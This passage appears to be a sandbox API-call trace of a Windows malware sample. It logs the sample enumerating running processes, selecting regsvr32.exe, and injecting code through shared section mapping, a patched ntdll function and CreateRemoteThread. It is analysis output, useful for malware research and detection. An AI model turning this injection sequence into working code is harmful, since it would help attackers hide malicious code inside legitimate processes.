th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0170.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0170.703] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0170.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0170.703] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.703] CloseHandle (hObject=0xd8) returned 1 [0170.704] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0170.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0170.704] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.704] CloseHandle (hObject=0xd8) returned 1 [0170.704] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0170.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0170.705] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.705] CloseHandle (hObject=0xd8) returned 1 [0170.705] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0170.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0170.705] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.705] CloseHandle (hObject=0xd8) returned 1 [0170.705] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0170.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0170.706] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.706] CloseHandle (hObject=0xd8) returned 1 [0170.706] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0170.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0170.707] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.707] CloseHandle (hObject=0xd8) returned 1 [0170.707] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0170.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0170.707] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.707] CloseHandle (hObject=0xd8) returned 1 [0170.707] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0170.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0170.708] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.708] CloseHandle (hObject=0xd8) returned 1 [0170.708] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0170.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0170.709] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.709] CloseHandle (hObject=0xd8) returned 1 [0170.709] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0170.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0170.709] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.709] CloseHandle (hObject=0xd8) returned 1 [0170.709] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0170.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0170.710] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.710] CloseHandle (hObject=0xd8) returned 1 [0170.710] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0170.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0170.710] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.710] CloseHandle (hObject=0xd8) returned 1 [0170.711] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0170.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0170.711] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.711] CloseHandle (hObject=0xd8) returned 1 [0170.711] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0170.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0170.712] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.712] CloseHandle (hObject=0xd8) returned 1 [0170.712] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0170.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0170.712] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.712] CloseHandle (hObject=0xd8) returned 1 [0170.712] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0170.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0170.713] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.713] CloseHandle (hObject=0xd8) returned 1 [0170.713] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0170.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0170.714] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.714] CloseHandle (hObject=0xd8) returned 1 [0170.714] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0170.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0170.714] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.714] CloseHandle (hObject=0xd8) returned 1 [0170.714] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0170.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0170.715] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.715] CloseHandle (hObject=0xd8) returned 1 [0170.715] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0170.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0170.715] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.716] CloseHandle (hObject=0xd8) returned 1 [0170.716] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0170.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0170.716] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.716] CloseHandle (hObject=0xd8) returned 1 [0170.716] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0170.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0170.717] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0170.717] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0170.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0170.718] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0170.718] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0170.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0170.719] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0170.720] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0170.720] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.720] CloseHandle (hObject=0xd8) returned 1 [0170.721] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0170.721] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0170.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0170.721] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.721] CloseHandle (hObject=0xd8) returned 1 [0170.721] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0170.721] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0170.721] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0170.721] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0170.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0170.722] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0170.722] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.722] CloseHandle (hObject=0xd8) returned 1 [0170.722] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0170.723] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.723] CloseHandle (hObject=0xd8) returned 1 [0170.723] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0170.723] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0170.724] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.724] CloseHandle (hObject=0xd8) returned 1 [0170.724] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.724] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0170.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x968) returned 0xd8 [0170.725] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.725] CloseHandle (hObject=0xd8) returned 1 [0170.725] lstrcmpiA (lpString1="regsvr32.exe", lpString2="explorer.exe") returned 1 [0170.725] lstrcmpiA (lpString1="regsvr32.exe", lpString2="svchost.exe") returned -1 [0170.725] lstrcmpiA (lpString1="regsvr32.exe", lpString2="dllhost.exe") returned 1 [0170.725] VirtualQuery (in: lpAddress=0x293b50, lpBuffer=0x10fb10, dwLength=0x30 | out: lpBuffer=0x10fb10*(BaseAddress=0x293000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0170.725] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.725] VirtualQuery (in: lpAddress=0x2937e0, lpBuffer=0x10fa60, dwLength=0x30 | out: lpBuffer=0x10fa60*(BaseAddress=0x293000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0170.725] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x968) returned 0xd8 [0170.725] VirtualQuery (in: lpAddress=0x293b50, lpBuffer=0x10fa60, dwLength=0x30 | out: lpBuffer=0x10fa60*(BaseAddress=0x293000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0170.726] NtCreateSection (in: SectionHandle=0x10fae0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x10fa78, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x10fae0*=0xdc) returned 0x0 [0170.726] NtMapViewOfSection (in: SectionHandle=0xdc, ProcessHandle=0xd8, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x50000, SectionOffset=0x0, ViewSize=0x10fa80*=0xb000) returned 0x0 [0170.730] NtCreateSection (in: SectionHandle=0x10fb58, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x10fa78, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x10fb58*=0xe0) returned 0x0 [0170.730] NtMapViewOfSection (in: SectionHandle=0xe0, ProcessHandle=0xd8, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x60000, SectionOffset=0x0, ViewSize=0x10fa80*=0x1000) returned 0x0 [0170.730] NtMapViewOfSection (in: SectionHandle=0xdc, ProcessHandle=0xffffffffffffffff, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x60000, SectionOffset=0x0, ViewSize=0x10fa80*=0xb000) returned 0x0 [0170.731] RtlMoveMemory (in: Destination=0x61000, Source=0x293f50, Length=0x0 | out: Destination=0x61000) [0170.731] RtlMoveMemory (in: Destination=0x67000, Source=0x293f50, Length=0x2200 | out: Destination=0x67000) [0170.731] RtlMoveMemory (in: Destination=0x6a000, Source=0x296150, Length=0x400 | out: Destination=0x6a000) [0170.731] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0170.731] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptHashData") returned 0x7fefdbfdac0 [0170.731] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0170.732] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptStringToBinaryA") returned 0x7fefd0ce59c [0170.732] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0170.732] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0170.732] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0170.732] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryA") returned 0x76e47070 [0170.732] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0170.732] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualProtect") returned 0x76e32ef0 [0170.732] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0170.733] GetProcAddress (hModule=0x76f50000, lpProcName="NtCreateSection") returned 0x76fa17b0 [0170.733] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0170.733] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0170.733] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0170.733] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0170.733] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0170.733] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xf) returned 0x7fefe261250 [0170.733] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x60000) returned 0x0 [0170.734] NtMapViewOfSection (in: SectionHandle=0xe0, ProcessHandle=0xffffffffffffffff, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x60000, SectionOffset=0x0, ViewSize=0x10fa80*=0x1000) returned 0x0 [0170.735] RtlMoveMemory (in: Destination=0x60000, Source=0x544b8, Length=0x23 | out: Destination=0x60000) [0170.735] RtlMoveMemory (in: Destination=0x60023, Source=0x2937e0, Length=0x363 | out: Destination=0x60023) [0170.735] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x60023) returned 0x0 [0170.808] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter64") returned 0xe4 [0170.808] GetLastError () returned 0x0 [0170.808] GetModuleHandleA (lpModuleName="ntdll") returned 0x76f50000 [0170.808] GetProcAddress (hModule=0x76f50000, lpProcName="atan") returned 0x76fd9604 [0170.809] ReadProcessMemory (in: hProcess=0xd8, lpBaseAddress=0x76fd9604, lpBuffer=0x10fb00, nSize=0xe, lpNumberOfBytesRead=0x10fb68 | out: lpBuffer=0x10fb00*, lpNumberOfBytesRead=0x10fb68*=0xe) returned 1 [0170.809] WriteProcessMemory (in: hProcess=0xd8, lpBaseAddress=0x76fd9604, lpBuffer=0x10faf0*, nSize=0xe, lpNumberOfBytesWritten=0x10fb68 | out: lpBuffer=0x10faf0*, lpNumberOfBytesWritten=0x10fb68*=0xe) returned 1 [0170.809] CreateRemoteThread (in: hProcess=0xd8, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x76fd9604, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe8 [0170.810] CloseHandle (hObject=0xe8) returned 1 [0170.810] Sleep (dwMilliseconds=0x1f4) [0171.375] WriteProcessMemory (in: hProcess=0xd8, lpBaseAddress=0x76fd9604, lpBuffer=0x10fb00*, nSize=0xe, lpNumberOfBytesWritten=0x10fb68 | out: lpBuffer=0x10fb00*, lpNumberOfBytesWritten=0x10fb68*=0xe) returned 1 [0171.375] CloseHandle (hObject=0xe4) returned 1 [0171.375] CloseHandle (hObject=0xe0) returned 1 [0171.375] CloseHandle (hObject=0xdc) returned 1 [0171.376] CloseHandle (hObject=0xd8) returned 1 [0171.376] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, 